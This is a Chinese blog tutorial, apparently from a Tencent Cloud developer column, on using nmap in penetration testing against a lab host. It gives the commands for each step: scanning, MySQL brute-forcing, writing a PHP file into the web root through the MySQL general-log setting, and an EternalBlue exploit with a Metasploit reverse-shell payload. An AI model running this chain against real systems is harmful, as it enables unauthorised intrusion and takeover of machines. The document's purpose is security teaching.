首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >nmap在渗透测试中的运用

nmap在渗透测试中的运用

作者头像
逍遥子大表哥
发布2021-12-19 10:04:43
发布2021-12-19 10:04:43
2.1K0
举报
文章被收录于专栏:kali blogkali blog

Nmap这个神器在渗透测试中是必不可少的。从信息收集到拿shell。有时候还真少不了它!本文将要介绍nmap在渗透测试中,都有那些运用和攻击手段。

一:利用nmap对目标进行信息收集

命令如下:

代码语言:javascript
复制
nmap -T4 -A 192.168.123.239

从上图我们发现,目标是一台windows系统,并且开启了常见的80 445 3306等常见的端口。

二:对目标站点进行扫描

命令如下:

代码语言:javascript
复制
dirb http://192.168.123.239

通过对目标站点分析,我们发现了一些敏感的文件目录。phpMyAdmin include等等。

在第一步中,我们扫描到了3306端口,这也意味着目标可以远程登录数据库。

三:利用nmap暴力破解mysql

命令如下:

代码语言:javascript
复制
nmap -p 3306 --script=mysql-brute.nse 192.168.123.239

如上,通过暴力破解,我们得到了账号和密码为root123456

四:尝试远程登录

命令如下:

代码语言:javascript
复制
mysql -h 192.168.123.239 -u root -p

成功登录数据库

利用phpMyAdmin拿shell

在前期的文章中提到过,我们先登录到phpMyAdin

执行下面的sql语句

代码语言:javascript
复制
SET GLOBAL GENERAL_log='on';
SET GLOBAL GENERAL_log_file='D:/phpstudy_pro/WWW/cmd.php';
SELECT '<?php phpinfo(); ?>';

需要注意的是,一定要写对目标的站点根目录的绝对地址

执行完成后,会在更目录生成一个cmd.php文件,我们访问效果如下:

利用此种方式,便可成功拿shell。

五:利用nmap扫描目标主机漏洞

命令如下:

代码语言:javascript
复制
nmap -v  --script=smb-vuln-*.nse --script-args=unsafe=1 ip -Pn

扫描结果如下:

可以看到,目标存在ms17-010 ms10-054 CVE-2017-0143等漏洞。

六:配合msfconsole那些系统权限

命令如下:

代码语言:javascript
复制
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.123.66
set payload windows/x64/meterpreter/reverse_tcp
exploti

通过上诉示例,我们利用nmap从简单的信息收集到拿shell。一次完整的渗透测试就完成了。

版权属于:逍遥子大表哥

本文链接:https://cloud.tencent.com/developer/article/1921420

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 一:利用nmap对目标进行信息收集
  • 二:对目标站点进行扫描
  • 三:利用nmap暴力破解mysql
  • 四:尝试远程登录
  • 利用phpMyAdmin拿shell
  • 五:利用nmap扫描目标主机漏洞
  • 六:配合msfconsole那些系统权限
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档